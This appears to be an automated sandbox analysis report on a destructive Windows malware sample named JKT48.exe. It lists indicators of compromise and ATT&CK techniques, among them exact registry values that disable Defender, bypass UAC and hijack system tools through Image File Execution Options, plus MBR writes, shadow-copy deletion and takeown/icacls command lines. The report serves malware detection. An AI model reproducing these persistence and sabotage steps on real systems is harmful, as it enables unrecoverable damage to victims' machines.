9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d

Resubmissions

28/03/2025, 14:59

250328-sc4wsazjx2 10

28/03/2025, 14:53

250328-r9rr2sxwbz 10

27/03/2025, 13:35

250327-qvr9laswew 10

Analysis

max time kernel
30s
max time network
42s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 14:59

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

JKT48.exe
Size

8.0MB
MD5

41f5bac802f5e79dc2ca7a3db25d0001
SHA1

ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
SHA256

9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
SHA512

94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
SSDEEP

196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63

Score

10^/10

bootkit defense_evasion discovery evasion execution exploit impact persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	JKT48.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	JKT48.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe	JKT48.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
1424	icacls.exe
6092	takeown.exe
1656	icacls.exe
4668	takeown.exe
3216	icacls.exe
2476	takeown.exe
5828	takeown.exe
4604	takeown.exe
2200	takeown.exe
1216	takeown.exe
2112	takeown.exe
5940	takeown.exe
4468	icacls.exe
1468	takeown.exe
2012	icacls.exe
5220	icacls.exe
5284	takeown.exe
5496	icacls.exe
1216	takeown.exe
1280	icacls.exe
4600	icacls.exe
2312	takeown.exe
32	takeown.exe
1660	icacls.exe
3920	icacls.exe
4968	icacls.exe
3676	takeown.exe
1276	takeown.exe
3204	takeown.exe
636	icacls.exe
2572	icacls.exe
732	takeown.exe
3500	takeown.exe
5616	icacls.exe
32	takeown.exe
4052	icacls.exe
5028	takeown.exe
4668	takeown.exe
964	icacls.exe
2856	icacls.exe
6036	takeown.exe
5164	icacls.exe
2884	takeown.exe
4544	icacls.exe
1808	icacls.exe
1952	icacls.exe
2416	icacls.exe
4620	icacls.exe
4748	icacls.exe
2572	icacls.exe
3692	takeown.exe
8	icacls.exe
4704	icacls.exe
5180	icacls.exe
5376	takeown.exe
1780	icacls.exe
1400	takeown.exe
5744	icacls.exe
4492	icacls.exe
4468	icacls.exe
6036	icacls.exe
3952	icacls.exe
4720	icacls.exe
3844	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	JKT48.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5192	icacls.exe
3220	takeown.exe
4996	takeown.exe
5768	takeown.exe
2184	icacls.exe
4704	takeown.exe
3592	takeown.exe
4736	icacls.exe
2264	icacls.exe
4280	takeown.exe
1344	icacls.exe
1260	icacls.exe
1500	icacls.exe
1780	icacls.exe
4628	takeown.exe
4048	takeown.exe
4032	icacls.exe
1904	takeown.exe
2416	icacls.exe
2880	icacls.exe
5892	takeown.exe
636	icacls.exe
1216	takeown.exe
868	takeown.exe
3320	icacls.exe
5112	takeown.exe
5136	takeown.exe
5892	takeown.exe
1448	takeown.exe
5864	icacls.exe
5204	takeown.exe
3532	icacls.exe
1560	takeown.exe
2408	takeown.exe
620	icacls.exe
5672	icacls.exe
3676	takeown.exe
5044	takeown.exe
5704	icacls.exe
4796	icacls.exe
4008	takeown.exe
5544	takeown.exe
4544	icacls.exe
232	icacls.exe
3500	takeown.exe
5408	takeown.exe
2412	icacls.exe
4780	takeown.exe
3856	icacls.exe
2580	takeown.exe
5496	icacls.exe
2956	takeown.exe
5464	takeown.exe
4732	takeown.exe
732	icacls.exe
4008	takeown.exe
4844	icacls.exe
4288	takeown.exe
5316	takeown.exe
4668	takeown.exe
3920	icacls.exe
5304	takeown.exe
2104	icacls.exe
5420	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	JKT48.exe

Drops file in System32 directory 29 IoCs

description	ioc	Process
File created	C:\windows\system32\utilman.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.exe	JKT48.exe
File created	C:\windows\syswow64\taskkill.exe	JKT48.exe
File created	C:\windows\system32\resmon.exe	JKT48.exe
File created	C:\windows\syswow64\taskmgr.exe	JKT48.exe
File created	C:\windows\syswow64\utilman.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\resmon.exe	JKT48.exe
File created	C:\windows\system32\taskmgr.exe	JKT48.exe
File created	C:\windows\system32\perfmon.exe	JKT48.exe
File created	C:\windows\system32\logonui.exe	JKT48.exe
File created	C:\windows\system32\taskkill.exe	JKT48.exe
File created	C:\windows\system32\sfc.exe	JKT48.exe
File created	C:\windows\system32\ntoskrnl.exe	JKT48.exe
File created	C:\windows\syswow64\rundll32.exe	JKT48.exe
File created	C:\windows\system32\msconfig.exe	JKT48.exe
File created	C:\windows\system32\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\sethc.exe	JKT48.exe
File created	C:\windows\system32\sethc.exe	JKT48.exe
File created	C:\windows\system32\rundll32.exe	JKT48.exe
File created	C:\windows\system32\winload.exe	JKT48.exe
File created	C:\windows\syswow64\sfc.exe	JKT48.exe
File created	C:\windows\system32\hal.dll	JKT48.exe
File created	C:\windows\syswow64\cmd.exe	JKT48.exe
File created	C:\windows\syswow64\regedit.exe	JKT48.exe
File created	C:\windows\system32\reg.exe	JKT48.exe
File created	C:\windows\system32\rstrui.exe	JKT48.exe
File created	C:\windows\syswow64\reg.exe	JKT48.exe
File created	C:\windows\system32\cmd.exe	JKT48.exe

Drops file in Program Files directory 54 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\RCXA12D.tmp	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCX6013.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\590603968	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\386775911	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\24666700	JKT48.exe
File opened for modification	C:\Program Files\dotnet\324306707	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCX9D4F.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCX6488.tmp	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\284777380	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\RCX9EE9.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\745088781	JKT48.exe
File created	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\386775911	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\745088781	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\RCXA12C.tmp	JKT48.exe
File created	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\dotnet\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCX7DBF.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\284777380	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\590603968	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\RCX6002.tmp	JKT48.exe
File created	C:\Program Files\dotnet\324306707	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCX9D60.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\RCX9ED8.tmp	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\RCX6489.tmp	JKT48.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\24666700	JKT48.exe
File opened for modification	C:\Program Files\dotnet\RCX7DC0.tmp	JKT48.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\windows\regedit.exe	JKT48.exe
File created	C:\windows\servicing\trustedinstaller.exe	JKT48.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1344	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4124	JKT48.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4124	JKT48.exe
Token: SeDebugPrivilege	4124	JKT48.exe
Token: SeIncBasePriorityPrivilege	4124	JKT48.exe
Token: SeTakeOwnershipPrivilege	2512	takeown.exe
Token: SeTakeOwnershipPrivilege	3752	takeown.exe
Token: SeTakeOwnershipPrivilege	2408	takeown.exe
Token: SeTakeOwnershipPrivilege	3692	takeown.exe
Token: SeTakeOwnershipPrivilege	5868	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	4280	takeown.exe
Token: SeTakeOwnershipPrivilege	6092	takeown.exe
Token: SeTakeOwnershipPrivilege	5616	takeown.exe
Token: SeTakeOwnershipPrivilege	2200	takeown.exe
Token: SeTakeOwnershipPrivilege	4400	takeown.exe
Token: SeTakeOwnershipPrivilege	2992	takeown.exe
Token: SeTakeOwnershipPrivilege	4612	takeown.exe
Token: SeTakeOwnershipPrivilege	1240	takeown.exe
Token: SeTakeOwnershipPrivilege	4720	takeown.exe
Token: SeTakeOwnershipPrivilege	5300	takeown.exe
Token: SeTakeOwnershipPrivilege	5328	takeown.exe
Token: SeTakeOwnershipPrivilege	4636	takeown.exe
Token: SeTakeOwnershipPrivilege	3712	takeown.exe
Token: SeTakeOwnershipPrivilege	32	takeown.exe
Token: SeTakeOwnershipPrivilege	3436	takeown.exe
Token: SeTakeOwnershipPrivilege	3064	takeown.exe
Token: SeTakeOwnershipPrivilege	3176	takeown.exe
Token: SeTakeOwnershipPrivilege	3220	takeown.exe
Token: SeTakeOwnershipPrivilege	6060	takeown.exe
Token: SeTakeOwnershipPrivilege	5388	takeown.exe
Token: SeTakeOwnershipPrivilege	4984	takeown.exe
Token: SeTakeOwnershipPrivilege	2900	takeown.exe
Token: SeTakeOwnershipPrivilege	3060	takeown.exe
Token: SeTakeOwnershipPrivilege	3592	takeown.exe
Token: SeTakeOwnershipPrivilege	1216	takeown.exe
Token: SeTakeOwnershipPrivilege	1276	takeown.exe
Token: SeTakeOwnershipPrivilege	884	takeown.exe
Token: SeTakeOwnershipPrivilege	4008	takeown.exe
Token: SeTakeOwnershipPrivilege	5640	takeown.exe
Token: SeTakeOwnershipPrivilege	4496	takeown.exe
Token: SeTakeOwnershipPrivilege	4628	takeown.exe
Token: SeTakeOwnershipPrivilege	4732	takeown.exe
Token: SeTakeOwnershipPrivilege	4692	takeown.exe
Token: SeTakeOwnershipPrivilege	5096	takeown.exe
Token: SeTakeOwnershipPrivilege	3792	takeown.exe
Token: SeTakeOwnershipPrivilege	5556	takeown.exe
Token: SeTakeOwnershipPrivilege	4276	takeown.exe
Token: SeTakeOwnershipPrivilege	5240	takeown.exe
Token: SeTakeOwnershipPrivilege	1704	takeown.exe
Token: SeTakeOwnershipPrivilege	4048	takeown.exe
Token: SeTakeOwnershipPrivilege	868	takeown.exe
Token: SeTakeOwnershipPrivilege	2164	takeown.exe
Token: SeTakeOwnershipPrivilege	796	takeown.exe
Token: SeTakeOwnershipPrivilege	5204	takeown.exe
Token: SeTakeOwnershipPrivilege	4984	takeown.exe
Token: SeTakeOwnershipPrivilege	5760	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	5532	takeown.exe
Token: SeTakeOwnershipPrivilege	3244	takeown.exe
Token: SeTakeOwnershipPrivilege	2376	takeown.exe
Token: SeTakeOwnershipPrivilege	2272	takeown.exe
Token: SeTakeOwnershipPrivilege	3856	takeown.exe
Token: SeTakeOwnershipPrivilege	4804	takeown.exe
Token: SeTakeOwnershipPrivilege	4536	takeown.exe
Token: SeTakeOwnershipPrivilege	2224	takeown.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4124	JKT48.exe
4124	JKT48.exe
4124	JKT48.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 2596	4124	JKT48.exe	87
PID 4124 wrote to memory of 2596	4124	JKT48.exe	87
PID 4124 wrote to memory of 4496	4124	JKT48.exe	89
PID 4124 wrote to memory of 4496	4124	JKT48.exe	89
PID 4124 wrote to memory of 4528	4124	JKT48.exe	91
PID 4124 wrote to memory of 4528	4124	JKT48.exe	91
PID 4124 wrote to memory of 4628	4124	JKT48.exe	93
PID 4124 wrote to memory of 4628	4124	JKT48.exe	93
PID 4124 wrote to memory of 4416	4124	JKT48.exe	96
PID 4124 wrote to memory of 4416	4124	JKT48.exe	96
PID 4124 wrote to memory of 4732	4124	JKT48.exe	98
PID 4124 wrote to memory of 4732	4124	JKT48.exe	98
PID 4124 wrote to memory of 4760	4124	JKT48.exe	100
PID 4124 wrote to memory of 4760	4124	JKT48.exe	100
PID 4124 wrote to memory of 4876	4124	JKT48.exe	102
PID 4124 wrote to memory of 4876	4124	JKT48.exe	102
PID 4124 wrote to memory of 2512	4124	JKT48.exe	104
PID 4124 wrote to memory of 2512	4124	JKT48.exe	104
PID 4124 wrote to memory of 6136	4124	JKT48.exe	106
PID 4124 wrote to memory of 6136	4124	JKT48.exe	106
PID 4124 wrote to memory of 2248	4124	JKT48.exe	108
PID 4124 wrote to memory of 2248	4124	JKT48.exe	108
PID 4124 wrote to memory of 4396	4124	JKT48.exe	110
PID 4124 wrote to memory of 4396	4124	JKT48.exe	110
PID 4124 wrote to memory of 5944	4124	JKT48.exe	112
PID 4124 wrote to memory of 5944	4124	JKT48.exe	112
PID 4124 wrote to memory of 5704	4124	JKT48.exe	114
PID 4124 wrote to memory of 5704	4124	JKT48.exe	114
PID 4124 wrote to memory of 3752	4124	JKT48.exe	116
PID 4124 wrote to memory of 3752	4124	JKT48.exe	116
PID 4124 wrote to memory of 5044	4124	JKT48.exe	118
PID 4124 wrote to memory of 5044	4124	JKT48.exe	118
PID 4124 wrote to memory of 2408	4124	JKT48.exe	120
PID 4124 wrote to memory of 2408	4124	JKT48.exe	120
PID 4124 wrote to memory of 6036	4124	JKT48.exe	122
PID 4124 wrote to memory of 6036	4124	JKT48.exe	122
PID 4124 wrote to memory of 3692	4124	JKT48.exe	124
PID 4124 wrote to memory of 3692	4124	JKT48.exe	124
PID 4124 wrote to memory of 4664	4124	JKT48.exe	126
PID 4124 wrote to memory of 4664	4124	JKT48.exe	126
PID 4124 wrote to memory of 5464	4124	JKT48.exe	128
PID 4124 wrote to memory of 5464	4124	JKT48.exe	128
PID 4124 wrote to memory of 5868	4124	JKT48.exe	130
PID 4124 wrote to memory of 5868	4124	JKT48.exe	130
PID 4124 wrote to memory of 1012	4124	JKT48.exe	132
PID 4124 wrote to memory of 1012	4124	JKT48.exe	132
PID 4124 wrote to memory of 2996	4124	JKT48.exe	134
PID 4124 wrote to memory of 2996	4124	JKT48.exe	134
PID 4124 wrote to memory of 3952	4124	JKT48.exe	136
PID 4124 wrote to memory of 3952	4124	JKT48.exe	136
PID 4124 wrote to memory of 428	4124	JKT48.exe	138
PID 4124 wrote to memory of 428	4124	JKT48.exe	138
PID 4124 wrote to memory of 1600	4124	JKT48.exe	140
PID 4124 wrote to memory of 1600	4124	JKT48.exe	140
PID 4124 wrote to memory of 1560	4124	JKT48.exe	142
PID 4124 wrote to memory of 1560	4124	JKT48.exe	142
PID 4124 wrote to memory of 2640	4124	JKT48.exe	144
PID 4124 wrote to memory of 2640	4124	JKT48.exe	144
PID 4124 wrote to memory of 1808	4124	JKT48.exe	146
PID 4124 wrote to memory of 1808	4124	JKT48.exe	146
PID 4124 wrote to memory of 1868	4124	JKT48.exe	148
PID 4124 wrote to memory of 1868	4124	JKT48.exe	148
PID 4124 wrote to memory of 4280	4124	JKT48.exe	150
PID 4124 wrote to memory of 4280	4124	JKT48.exe	150

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\JKT48.exe
"C:\Users\Admin\AppData\Local\Temp\JKT48.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4124
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a
  2⤵
  PID:2596
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F
  2⤵
  PID:4496
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-3920955164-3782810283-1225622749-1000" /a
  2⤵
  PID:4528
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-3920955164-3782810283-1225622749-1000" /grant Administrators:F
  2⤵
  PID:4628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\2f3e0199fccb3f72e8a39924edc6a781" /a
  2⤵
  PID:4416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\2f3e0199fccb3f72e8a39924edc6a781" /grant Administrators:F
  2⤵
